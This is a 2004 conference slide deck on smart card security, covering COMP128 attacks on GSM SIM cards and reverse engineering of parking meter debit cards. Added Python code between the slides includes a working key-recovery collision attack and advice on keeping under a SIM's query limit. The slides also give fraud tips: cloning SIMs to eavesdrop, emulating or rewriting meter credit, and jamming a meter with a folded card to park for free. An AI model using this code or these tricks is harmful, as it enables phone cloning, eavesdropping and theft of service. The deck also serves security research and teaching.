- Number of slides: 87
Smart Card Security: From GSM to Parking Meters. David Hulton
Disclaimer § Educational purposes only § Curiosity not fraud § Full disclosure © 2004 Dachb0den Labs
Goals § This talk will cover: § Introduction to Smart Cards § Basic Technical Knowledge § Analyzing Proprietary Cards § Asynchronous - GSM SIM Cards § Synchronous - Parking Meter Cards § Breaking it!
Introduction – What is a Smart Card? § ISO 7816 Standard § Durability Requirements § Pin Layout § Asynchronous Protocols (T=0, T=1)
Introduction - Durability Requirements § UV Light Protection § X-Ray Protection § Surface Profile § Contacts § Mechanical Strength § Electrical Resistance § Magnetic Field § Static Electricity § Bending Resilience § … blah …
Introduction - Pin Layout [ISO 7816-2 contact drawing; dimensions marked: 1.7 mm, 2 mm, 19.23 mm, 10.25 mm] Contacts: Vcc, Gnd, Reset, Vpp, Clock, I/O, RS1, RS2
Introduction - Protocols § Asynchronous § T=0 – Half-duplex character transmission § T=1 – Half-duplex block transmission § Operates at a set baud rate, 9600/19200/etc. § Uses APDU Protocol (Application Protocol Data Unit) § Synchronous § Clock set by reader, used with Memory/Security Cards
Introduction – Asynchronous Cards § All Processor Cards § GSM SIM Cards § Bank Cards § PKI Token Cards § Java Cards
Asynchronous Protocol (T=0) § Uses Clk, Rst, & I/O to create a 9600 bps connection § Reader sets Rst line high (5 V) § Reader sends APDU command across I/O: a0 a4 00 00 02 7f 20 (Command = a0 a4 00 00, Len = 02, Data/arguments = 7f 20) § Reader receives response: 19
GSM SIMs § Rely on COMP128 Algorithm for security of Ki [diagram: the GSM Base Station sends a Challenge to the Phone; the SIM Card computes COMP128 over Ki and the challenge; the Phone returns the Response]
GSM Attacks § COMP128 Attacks § Narrow pipe collision attack § Side-channel attack § What does it get you? § Clone phones § Eavesdrop § Downsides? § Attacks SIM card § Possibility of killing the card
Interfacing with the Card § Towitoko CHIPDRIVE micro 130 § Hardware § http://www.towitoko.de § http://www.txsystems.com § Software § dsccmd.exe (will be released on dachb0den.com soon) § Dumb Mouse § Hardware § http://cuba.calyx.nl/hip/dumbmouse.html § Software § ftp://ftp.ccc.de/gsm § Season (?) § See Phrack 62-15
Protocol § Connect to card § Insert card § Select GSM directory on card § a0 a4 00 00 02 7f 20 § Authenticate with PIN § a0 20 00 01 08 xx xx ff ff § Run COMP128 § a0 88 00 00 10 xx xx xx xx (16-byte challenge) Thankz CCC and ender
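The three commands on this slide, built and exchanged as T=0 APDUs, as an added example that is not the talk's dsccmd tool. The card side is a constructed model so the exchange runs offline: it checks the command framing, keeps the CHV1 retry counter (three strikes, as a later slide notes for SIMs), counts RUN GSM ALGORITHM invocations against a query budget, and answers with a SHA-256 stand-in instead of COMP128. Assumptions: the model's status words 6F 00 for an exhausted counter and 6C xx for a wrong GET RESPONSE length are this model's choices; swap CardModel.transmit for a pyscard/PC/SC connection to talk to a real SIM.

```python
"""GSM 11.11 commands from the slide as T=0 APDUs, with a constructed card model."""
import hashlib

CLA_GSM = 0xA0
INS_SELECT, INS_VERIFY_CHV, INS_RUN_GSM_ALGORITHM, INS_GET_RESPONSE = 0xA4, 0x20, 0x88, 0xC0
DF_GSM = b"\x7f\x20"                      # a0 a4 00 00 02 7f 20 selects this directory
SW_OK, SW_CHV_WRONG, SW_CHV_BLOCKED = b"\x90\x00", b"\x98\x04", b"\x98\x40"


def select(file_id):
    return bytes([CLA_GSM, INS_SELECT, 0x00, 0x00, 0x02]) + file_id


def verify_chv1(pin):
    """a0 20 00 01 08 + PIN digits as ASCII, padded to 8 bytes with ff."""
    digits = pin.encode("ascii")
    if not digits.isdigit() or not 4 <= len(digits) <= 8:
        raise ValueError("CHV1 is 4 to 8 decimal digits")
    return bytes([CLA_GSM, INS_VERIFY_CHV, 0x00, 0x01, 0x08]) + digits.ljust(8, b"\xff")


def run_gsm_algorithm(rand):
    """a0 88 00 00 10 + 16-byte RAND; the card answers 9f 0c and GET RESPONSE
    fetches SRES (4 bytes) || Kc (8 bytes)."""
    if len(rand) != 16:
        raise ValueError("RAND is 16 bytes")
    return bytes([CLA_GSM, INS_RUN_GSM_ALGORITHM, 0x00, 0x00, 0x10]) + rand


def get_response(length):
    return bytes([CLA_GSM, INS_GET_RESPONSE, 0x00, 0x00, length])


class CardModel:
    """Constructed T=0 SIM: checks framing, CHV state, retry counter, query budget."""

    def __init__(self, chv1="1234", ki=bytes(16), max_runs=65535):
        self._chv1 = chv1.encode("ascii").ljust(8, b"\xff")
        self._ki, self.max_runs = ki, max_runs
        self.chv_attempts, self.selected, self.verified = 3, None, False
        self.algo_runs, self._pending = 0, b""

    def transmit(self, apdu):
        """Returns (data, status word). In T=0, data only comes back via GET RESPONSE."""
        cla, ins, p1, p2, p3 = apdu[:5]
        data = apdu[5:]
        if cla != CLA_GSM:
            return b"", b"\x6e\x00"                         # class not supported
        if ins == INS_SELECT and p3 == 2 and len(data) == 2:
            self.selected, self._pending = data, bytes(22)  # constructed file info
            return b"", b"\x9f\x16"                         # 0x16 bytes waiting
        if ins == INS_VERIFY_CHV and p2 == 1 and p3 == 8 and len(data) == 8:
            if self.chv_attempts == 0:
                return b"", SW_CHV_BLOCKED
            if data == self._chv1:
                self.verified, self.chv_attempts = True, 3
                return b"", SW_OK
            self.chv_attempts -= 1                          # one strike
            return b"", SW_CHV_WRONG if self.chv_attempts else SW_CHV_BLOCKED
        if ins == INS_RUN_GSM_ALGORITHM and p3 == 16 and len(data) == 16:
            if self.selected != DF_GSM or not self.verified:
                return b"", SW_CHV_WRONG                    # access condition not fulfilled
            if self.algo_runs >= self.max_runs:
                return b"", b"\x6f\x00"                     # model's choice for a dead card
            self.algo_runs += 1
            out = bytearray(hashlib.sha256(self._ki + data).digest()[:12])  # stand-in, NOT COMP128
            out[10] &= 0xFC
            out[11] = 0                                     # Kc is padded with 10 zero bits
            self._pending = bytes(out)
            return b"", b"\x9f\x0c"
        if ins == INS_GET_RESPONSE:
            if p3 != len(self._pending):
                return b"", bytes([0x6c, len(self._pending)])   # wrong Le, right length given
            data, self._pending = self._pending, b""
            return data, SW_OK
        return b"", b"\x6d\x00"                             # instruction not supported


def authenticate(card, pin, rand):
    """The exchange from the slide; returns (SRES, Kc) or raises with the status word."""
    _, sw = card.transmit(select(DF_GSM))
    if sw[0] != 0x9F and sw != SW_OK:
        raise RuntimeError(f"SELECT DF_GSM failed: {sw.hex()}")
    _, sw = card.transmit(verify_chv1(pin))
    if sw != SW_OK:                            # 9804: attempts left, 9840: CHV1 blocked
        raise RuntimeError(f"VERIFY CHV1 failed: {sw.hex()}")
    _, sw = card.transmit(run_gsm_algorithm(rand))
    if sw[0] != 0x9F:
        raise RuntimeError(f"RUN GSM ALGORITHM failed: {sw.hex()}")
    data, sw = card.transmit(get_response(sw[1]))
    if sw != SW_OK or len(data) != 12:
        raise RuntimeError(f"GET RESPONSE failed: {sw.hex()}")
    return data[:4], data[4:]


if __name__ == "__main__":
    sim = CardModel(chv1="1234", ki=bytes(range(16)))
    sres, kc = authenticate(sim, "1234", bytes(16))
    print("SRES", sres.hex(), "Kc", kc.hex(), "runs so far", sim.algo_runs)
```

Two things the model makes visible that matter when attacking a SIM: a wrong CHV1 costs one of three attempts and the card stays blocked even for the right PIN afterwards, and every RUN GSM ALGORITHM counts against whatever budget the card enforces, so an attack tool should track algo_runs and stop well short of it.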
Demonstration
Don't know the protocol? § Make your own! (Phrack 62-15) § Buy a Season § http://www.sdlogic.com § Beware, could get sued by Primestar/DirecTV
Narrow Pipe Collision Attack § How to do it? § Ian Goldberg (with Marc Briceno and David Wagner, 1998) found a narrow pipe in COMP128 which attacks the second round (2-R Attack) § Collisions in COMP128 responses reveal key information § Can crack COMP128 in ~115,000 queries
GSM Precautions § New SIM Cards § Card will die after 65,535 queries § Optimizations in COMP128 attack allow cracking in < 20,000 queries
COMP128(challenge)
Initialization:
  For i = 0 … 15
    x[i + 16] = challenge[i]
Scrambling:
  For i = 1 … 8
    For j = 0 … 15
      x[j] = key[j]
    For j = 0 … 4
      For k = 0 … 2^j - 1
        For l = 0 … 2^(4-j) - 1
          m = l + k * 2^(5-j)
          n = m + 2^(4-j)
          y = (x[m] + 2 * x[n]) % 2^(9-j)
          z = (2 * x[m] + x[n]) % 2^(9-j)
          x[m] = table[j][y]
          x[n] = table[j][z]
    For j = 0 … 31
      For k = 0 … 3
        bit[4 * j + k] = (x[j] >> (3 - k)) & 1
    if (i < 8)
      For j = 0 … 15
        x[j + 16] = 0
        For k = 0 … 7
          nb = ((8 * j + k) * 17) % 128
          x[j + 16] |= bit[nb] << (7 - k)
Output:
  For i = 0 … 3
    output[i] = (x[2 * i] << 4) | x[2 * i + 1]
  For i = 0 … 5
    output[4 + i] = (x[2 * i + 18] << 6) | (x[2 * i + 19] << 2) | (x[2 * i + 20] >> 2)
  output[10] = (x[30] << 6) | (x[31] << 2)
  output[11] = 0
COMP128(challenge): the same listing again, overlaid with the caption "Compliments of the NSA" (Thanks NSA)
COMP128 For Dummies: COMP128(Challenge) → X[32]: bytes 0-15 = Ki, bytes 16-31 = Challenge → FFT_Bit_Reduction()
COMP128 - FFT Bit Reduction, worked with key = all zeros and challenge = all zeros. x[32] (columns 0 … f) starts as 00 00 … 00; with all-zero inputs every lookup in a level hits table[j][0], so each level fills the whole state with one value:
Round 1 (8-bit values): the first pair becomes 66 66, and pair by pair every byte becomes 66
Round 2 (7-bit values): 1c spreads the same way until every byte is 1c
Round 3 (6-bit values): every byte becomes 37
Round 4 (5-bit values): every byte becomes 08
Round 5 (4-bit values): every byte becomes 05
COMP128 For Dummies: COMP128(Challenge) → X[32]: bytes 0-15 = Ki, bytes 16-31 = Challenge → FFT_Bit_Reduction() → Reduce_Bytes() → Shift_Bytes() → Repeat 7 Times → Return, Null-pad_10_bits!()
COMP128 - Baseline 2-R Attack
key = 01 23 45 67 89 ab cd ef fe dc ba 98 76 54 32 10
challenge A = 23 00 00 00 00 00 00 00 55 00 00 00 00 00 00 00
x[32] =  0  1  2  3  4  5  6  7  8  9  a  b  c  d  e  f
        01 23 45 67 89 ab cd ef fe dc ba 98 76 54 32 10
        23 00 00 00 00 00 00 00 55 00 00 00 00 00 00 00
We first look for challenges that have the same responses (collisions)
Same key, challenge B = 0d 00 00 00 00 00 00 00 e7 00 00 00 00 00 00 00
x[32] =  0  1  2  3  4  5  6  7  8  9  a  b  c  d  e  f
        01 23 45 67 89 ab cd ef fe dc ba 98 76 54 32 10
        0d 00 00 00 00 00 00 00 e7 00 00 00 00 00 00 00
Round 1 (first butterfly level, pairs x[l] with x[l+16]), first pair done, then all sixteen:
A:      0e 2f 01 e8 cc 44 e4 17 d0 7f 8f 90 3a c9 0d 6d
        d3 31 96 c6 35 4a a7 e2 f3 ea e3 1a 18 d9 57 fc
B:      df 2f 01 e8 cc 44 e4 17 2e 7f 8f 90 3a c9 0d 6d
        bc 31 96 c6 35 4a a7 e2 21 ea e3 1a 18 d9 57 fc
(only bytes 0, 8, 16 and 24 differ between A and B)
Round 2 (second level, pairs x[l] with x[l+8] and x[l+16] with x[l+24]): after the first pair x[0] = 37 and x[8] = 60 for both; after all pairs:
A:      37 5e 05 27 5a 1f 7a 11 60 36 6b 39 31 42 69 28
        7a 31 96 c6 35 4a a7 e2 64 ea e3 1a 18 d9 57 fc
B:      37 5e 05 27 5a 1f 7a 11 60 36 6b 39 31 42 69 28
        7a 31 96 c6 35 4a a7 e2 64 ea e3 1a 18 d9 57 fc
Collision!
COMP128 § What can we do with this collision? § If we get a collision from COMP128 with those 2 challenges, we know that 2 bytes of the key must be those 2 values: if COMP128(chall = 23 00 … 55 00 …) == COMP128(chall = 0d 00 … e7 00 …) then we know key = 01 xx xx xx xx xx xx xx fe xx xx xx xx xx xx xx § Repeat 8 times, once per byte pair (i, i+8), until the full key is recovered
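The baseline 2-R attack end to end, as an added example that is neither the talk's nor Goldberg's code: the butterfly, bit permutation and output packing follow the slide's pseudocode, but the five lookup tables are not on the slide, so constructed pseudo-random tables of the right shape (2^(9-j) entries of (8-j)-bit values) stand in for them; the real tables drop in unchanged. narrow_pipe() is the four bytes i, i+8, i+16, i+24 after the first two levels, which only key[i], key[i+8], chal[i], chal[i+8] reach, and which are already 7-bit values: 32 bits in, 28 bits out. The card is simulated by make_card(); against hardware it would wrap RUN GSM ALGORITHM.

```python
"""2-R narrow-pipe collision attack on a COMP128-shaped function (constructed tables)."""
import random

_rng = random.Random(2004)
TABLES = [[_rng.randrange(1 << (8 - j)) for _ in range(1 << (9 - j))] for j in range(5)]


def _compress(x):
    """The five butterfly levels from the slide, in place on 32 values."""
    for j in range(5):
        t, mod = TABLES[j], 1 << (9 - j)
        for k in range(1 << j):
            for l in range(1 << (4 - j)):
                m = l + (k << (5 - j))
                n = m + (1 << (4 - j))
                y, z = (x[m] + 2 * x[n]) % mod, (2 * x[m] + x[n]) % mod
                x[m], x[n] = t[y], t[z]


def comp128(key, chal):
    """Eight rounds -> 12 bytes: SRES (4) || Kc (8, last 10 bits zero)."""
    x = [0] * 16 + list(chal)
    for rnd in range(8):
        x[:16] = key
        _compress(x)
        if rnd < 7:                                  # no permutation after the last round
            bits = [(v >> (3 - k)) & 1 for v in x for k in range(4)]
            for j in range(16):
                x[16 + j] = sum(bits[((8 * j + k) * 17) % 128] << (7 - k) for k in range(8))
    out = [(x[2 * i] << 4) | x[2 * i + 1] for i in range(4)]
    out += [((x[2 * i + 18] << 6) | (x[2 * i + 19] << 2) | (x[2 * i + 20] >> 2)) & 0xFF for i in range(6)]
    out += [((x[30] << 6) | (x[31] << 2)) & 0xFF, 0]
    return bytes(out)


def narrow_pipe(k_i, k_i8, c_i, c_i8):
    """Bytes i, i+8, i+16, i+24 after levels 0 and 1 of round 1 (four 7-bit values)."""
    t0, t1 = TABLES[0], TABLES[1]
    xa, xc = t0[(k_i + 2 * c_i) % 512], t0[(2 * k_i + c_i) % 512]        # level 0: (i, i+16)
    xb, xd = t0[(k_i8 + 2 * c_i8) % 512], t0[(2 * k_i8 + c_i8) % 512]    # level 0: (i+8, i+24)
    return (t1[(xa + 2 * xb) % 256], t1[(2 * xa + xb) % 256],            # level 1: (i, i+8)
            t1[(xc + 2 * xd) % 256], t1[(2 * xc + xd) % 256])            # level 1: (i+16, i+24)


def make_card(ki, fast=True):
    """Simulated SIM. fast=True answers with the eight round-1 pipe states rather than
    the 12-byte response: for a fixed Ki the response is a function of those states, so
    the same challenge pairs collide (bar a 2^-96 fluke) and the search is much faster in
    Python. fast=False answers with the full function."""
    if not fast:
        return lambda chal: comp128(ki, chal)
    return lambda chal: tuple(narrow_pipe(ki[i], ki[i + 8], chal[i], chal[i + 8]) for i in range(8))


def collisions(card, i):
    """Yield (chal_a, chal_b, queries_so_far): challenges differing only in bytes i and
    i+8 with identical answers. Pairs sharing byte i or byte i+8 are skipped: they usually
    come from a level-0 collision on one side and leave the other key byte undetermined."""
    seen = {}
    for v in range(1 << 16):
        chal = bytearray(16)
        chal[i], chal[i + 8] = v >> 8, v & 0xFF
        chal = bytes(chal)
        prev = seen.setdefault(card(chal), chal)
        if prev is not chal and prev[i] != chal[i] and prev[i + 8] != chal[i + 8]:
            yield prev, chal, v + 1


def recover_pair(chal_a, chal_b, i, pool=None):
    """Offline: the (key[i], key[i+8]) values under which both challenges reach the
    same narrow-pipe state."""
    a, a8, b, b8 = chal_a[i], chal_a[i + 8], chal_b[i], chal_b[i + 8]
    if pool is None:
        pool = [(ka, kb) for ka in range(256) for kb in range(256)]
    return [(ka, kb) for ka, kb in pool if narrow_pipe(ka, kb, a, a8) == narrow_pipe(ka, kb, b, b8)]


def recover_ki(card, positions=range(8)):
    """Baseline 2-R attack: one collision per byte pair, intersecting candidate sets
    if a collision leaves more than one. Returns (key, total queries)."""
    key, total = bytearray(16), 0
    for i in positions:
        cands, q = None, 0
        for chal_a, chal_b, q in collisions(card, i):
            cands = recover_pair(chal_a, chal_b, i, cands)
            if len(cands) == 1:
                break
        if not cands or len(cands) != 1:
            raise RuntimeError(f"byte pair {i}: no usable collision in 65536 queries")
        key[i], key[i + 8] = cands[0]
        total += q
    return bytes(key), total


if __name__ == "__main__":
    KI = bytes.fromhex("0123456789abcdeffedcba9876543210")      # the slide's example key
    card = make_card(KI)
    key, queries = recover_ki(card)
    print(f"recovered Ki {key.hex()} with {queries} queries, match={key == KI}")
    a, b, _ = next(collisions(card, 0))
    print("full COMP128 collides on that pair:", comp128(KI, a) == comp128(KI, b))
```

The query count the attack reports is the birthday bound on a 28-bit pipe, roughly 2^14 per byte pair, which is where the ~115,000 total for eight pairs comes from and why the 65,535-query limit on newer cards bites before the baseline attack finishes.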
COMP128 Optimizations § This baseline attack takes 115,000 tries § Card will die after 65,535 requests § How do we get the number down? § Precompute all collisions § Find the challenges that collide the most § Try them first § Still not fast enough?
COMP128 - 3-R Attack § Once we know bytes 0 and 8 of the key, we can attack the 3rd round virtually 1 byte at a time (the third butterfly level pairs bytes 4 apart, so the next unknowns are key bytes 4 and 12): x[0..15] = 01 00 00 00 xx 00 00 00 fe 00 00 00 xx 00 00 00 § These require a bit of pre-computation but only ~768 tries § After byte 4 falls: 01 00 00 00 89 00 00 00 fe 00 00 00 xx 00 00 00, then byte 12
COMP128 - 4-R Attack § Same for the 4th round (pairs 2 apart: key bytes 2, 6, 10, 14): 01 00 xx 00 89 00 00 00 fe 00 00 00 76 00 00 00 (byte 2 first, then 6, 10, 14) → 01 00 45 00 89 00 cd 00 fe 00 ba 00 76 00 xx 00
COMP128 - 5-R Attack § And the 5th (adjacent pairs: the odd key bytes): 01 xx 45 00 89 00 cd 00 fe 00 ba 00 76 00 32 00 (byte 1 first, then the other odd bytes) → 01 23 45 67 89 ab cd ef fe dc ba 98 76 54 32 xx § Key = 01 23 45 67 89 ab cd ef fe dc ba 98 76 54 32 10 § 0wned (in < 20 thousand tries)
COMP128 Attack § Works on most GSM carriers in the US § T-Mobile § Cingular § Etc. § New attack takes around 15 minutes w/ precomputed dictionary § SIM card emulators can be purchased online or emulated with a $2 PIC § Open Source tools will be released shortly § SIM SCAN v2 implements this (thx Dejan Kaljevic)
Parking Meters? WTF is a Parking Meter? [photo of a meter, labelled: Smart Card slot, Coin Input, Coin Output]
PARKING METER DEBIT CARD 1. Insert debit card into meter in direction shown by arrow. 2. The meter will increment in 6 min. segments. 3. When desired time is displayed, remove card. DID YOU BUY TOO MUCH TIME? TO OBTAIN EXTRA TIME REFUND: Insert the same debit card that was used to purchase time on the meter. Full 6 minute increments will be credited to the card. Increments of less than 6 minutes will be lost.
Introduction – Synchronous Cards § Memory Cards § Kinkos Cards § Internet Café Cards § Cash Cards § Parking Meters
Synchronous Protocol § Also uses Clk, Rst, and I/O § Clk sets the transfer speed § When Clk is high (5 V) read from I/O, write when it's low (Gnd) § Reader sets Rst line high (5 V) § After Rst drops, card starts sending bits to reader, one for each high Clk [timing diagram: Rst, Clk and I/O traces; Bit 0 = 1, Bit 1 = 0]
Parking Meter Cards § Similar to the SLE4406 (European Telecom Card) § Implements a one-way counter § Bits are set by a programmer § Fuse is blown § Bits will only go 1 -> 0
Demonstration
Parking Meter Card – Memory Dump
98 FF 00 00 FF FF FE FF FF 14 FF 00 00 FF FF FF FF 3C FF 00 00 FF FF 92 FF 00 00 00 F8 FF FF FF 00 00 00 FF FF 46 FF 00 00 00 FF FF B1 00 00 00 00 FF FF FF FF FF FF FF FF 00 00 FF FF FF FF 00 00 80 FF FF FF FF 00 00 FF FF
Annotated regions: ATR (Answer to Reset), Credit Bits, Refund Buffer Bits, Serial Number, Refund Bits
1 bit = $0.10; 6 bits + 7 bits = $1.30
Parking Meter Card - Tapping § Reverse Engineering the Protocol § Tap the connection § Log the data § Decode protocol
Tapping the Connection § Make a fake smart card § Plastic card § Copper tape § Get a smart card socket § Rip it out of a smart card reader § Connect the two with a cable § Old floppy/IDE cables work well § Tap the connection § Vampire clips § Run signal through 10k resistors to a buffer § Connect buffer to a parallel port
ASCII Art [schematic: the fake smart card and the smart card reader socket are wired pin-to-pin (Vcc, Gnd, Reset, Vpp, Clock, I/O, RF1, RF2); Reset, Clock, I/O and RF1 are tapped through 10k resistors r1 to r4 into a 74HCT541N buffer powered from an external 5 V (USB) supply, whose outputs drive the parallel port status inputs D10 Ack (I6), D11 Busy (I7), D12 Paper Out (I5) and D13 Select (I4), with D25 as Gnd] Sneak peek of possible future Phrack article
Logging the Data § Sniffing connection (synclog.c) § Poll parallel port I/O § If I/O lines change, log it to memory § When finished, write bits to log file
Logging the Data (synclog.c source listing; only "#include" survived extraction)
Decoding Protocol § Convert to bytes (analyze.c) § Push a bit into our buffer every time the clock is high § When reset is high, reset bit counter and print buffer § Time graph analysis (timing.pl) § Plot 2-D graph of communication (thx prole!) § Uses GD to plot a large jpg
Demonstration
Protocol Dumps
Memory Dump:
00011001001010001111001111000100100100000110001010001101
111111111111111111111111111111110000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000111111111111111111111111111111111111111111111111111111111
Write to Card:
00011001001010001111001111000100100100000110001010001101
11111111011110101101
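The decoding step from the previous slides (analyze.c: clock in a bit, start a new frame on reset) together with the two checks an operator or an attacker wants on a one-way counter card, as an added example that is not the talk's synclog.c or analyze.c. Assumptions: the poller yields (rst, clk, io) samples in order; bytes are packed LSB-first (the slide's first dumped byte 98 is the bit run 00011001 above); and the credit region offsets passed to counter_value() are the caller's, since the talk does not give exact offsets. make_trace() builds a constructed poller trace so the decoder can be exercised offline, including a clock that stays high across several polls.

```python
"""Decode a sampled synchronous-card session and check a one-way counter."""

CENTS_PER_BIT = 10                      # "1 bit = $0.10"


def decode_sync_trace(samples):
    """Return one bit string per Reset cycle. Samples are (rst, clk, io) as 0/1.
    A bit is taken on the RISING edge of Clk: a poller faster than the clock sees
    the same high Clk on consecutive samples, and taking a bit on every sample
    where the clock is high would duplicate bits."""
    frames, bits, prev_rst, prev_clk = [], [], 0, 0
    for rst, clk, io in samples:
        if rst and not prev_rst:                   # Reset asserted: flush the frame
            if bits:
                frames.append("".join(map(str, bits)))
            bits = []
        elif not rst and clk and not prev_clk:     # Clk went high: the card's bit is valid
            bits.append(io)
        prev_rst, prev_clk = rst, clk
    if bits:
        frames.append("".join(map(str, bits)))
    return frames


def bits_to_bytes(bitstr):
    """Pack a frame into bytes, LSB first within each byte (assumption above)."""
    out = bytearray()
    for off in range(0, len(bitstr) - len(bitstr) % 8, 8):
        out.append(int(bitstr[off:off + 8][::-1], 2))
    return bytes(out)


def counter_value(bitstr, start, length):
    """Credit left in a one-way counter region: every remaining 1 bit is one unit,
    and the meter deducts by burning a 1 to 0."""
    return bitstr[start:start + length].count("1") * CENTS_PER_BIT


def one_way_violation(before, after):
    """Index of the first bit that went 0 -> 1 between two dumps of the same card,
    or None. A fuse counter cannot do that; a card that does is being rewritten
    or emulated."""
    if len(before) != len(after):
        raise ValueError("dumps differ in length")
    for idx, (b, a) in enumerate(zip(before, after)):
        if b == "0" and a == "1":
            return idx
    return None


def make_trace(frames, clk_high_samples=2):
    """CONSTRUCTED poller output: a Reset pulse per frame, then for each bit the
    card drives I/O while Clk is low and holds it while Clk stays high."""
    samples = []
    for bits in frames:
        samples += [(1, 0, 1), (1, 0, 1), (0, 0, 1)]      # Reset high, then released
        for b in bits:
            samples.append((0, 0, int(b)))
            samples += [(0, 1, int(b))] * clk_high_samples
    samples.append((1, 0, 1))                              # final Reset closes the last frame
    return samples


ATR_BITS = "00011001001010001111001111000100100100000110001010001101"   # first 56 bits of the slide's dump

if __name__ == "__main__":
    card_dump = ATR_BITS + "1" * 13 + "0" * 7               # constructed: ATR, then 13 credits
    frame = decode_sync_trace(make_trace([card_dump]))[0]
    print("ATR bytes:", bits_to_bytes(frame)[:7].hex())
    print("credit: $%.2f" % (counter_value(frame, 56, 20) / 100))
    print("tamper check:", one_way_violation(ATR_BITS + "1" * 11 + "0" * 9, frame))
```

Keeping both the previous and the current dump per serial number is what makes one_way_violation() useful in practice: a genuine card only ever loses bits between visits, so a card that gains credit between two reads was reloaded or emulated, whatever its ATR and serial number say.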
Timing Graph Analysis - Deduct [plot of Rst, Clk, I/O and Rsv1 over time: the meter reads the card] Then issues Write to Card command
Timing Graph Analysis - Refund [plots of Rst, Clk, I/O and Rsv1: the meter reads the card, then issues Write to Card command; a second plot shows 1 Credit, then 2 Credits] Refunds 2 credits to parking meter card
Emulate Protocol § Code a PIC to speak the protocol § See Phrack 48-11 for hints § PIC16F84A § Supply RC or external clock and connect proper pins § Tip: Tie clock line to interrupt § Full code & schematics may be released in Phrack 63 § See me for more detailz
BRUTE FORCE!!!!! § Impatient? § Fold a business card in half § Insert into meter's slot so it's difficult to remove § Meter will go out of order after ~90 seconds § Out of order meters are free
Parking Meters Owned
Other Security Memory Cards § SLE4442/SLE4428 § Implement a PIN for write access § Similar to GSM SIM cards § 3 strikes, you're out! § University soda machines § Each card has different PIN § Reader performs voodoo magic to determine PIN § Rewrites credits on card (thx Michael Stegan) § Most of the time § Same PIN on every card
Conclusions § David Hulton § h1kari@dachb0den.com § http://www.dachb0den.com § References § Phrack 48-10/11 § Phrack 62-15 § ISO 7816-1/2/3 § http://www.cs.berkeley.edu/isaac/gsm.html § http://www.towitoko.de § http://www.sdlogic.com
Conclusions / Shameful Plugz § Come to ToorCon! § September 24th-26th, 2004 § http://www.toorcon.org § Celebrating 20 Years After Big Brother § Come to ShmooCon! § Super Bowl Weekend, 2005 § http://www.shmoocon.com § No moose, (they swear). § Come to LayerOne! § http://www.layerone.info
Questions? Suggestions? § Got any good cards to look at? § Anything I missed? (mercy!)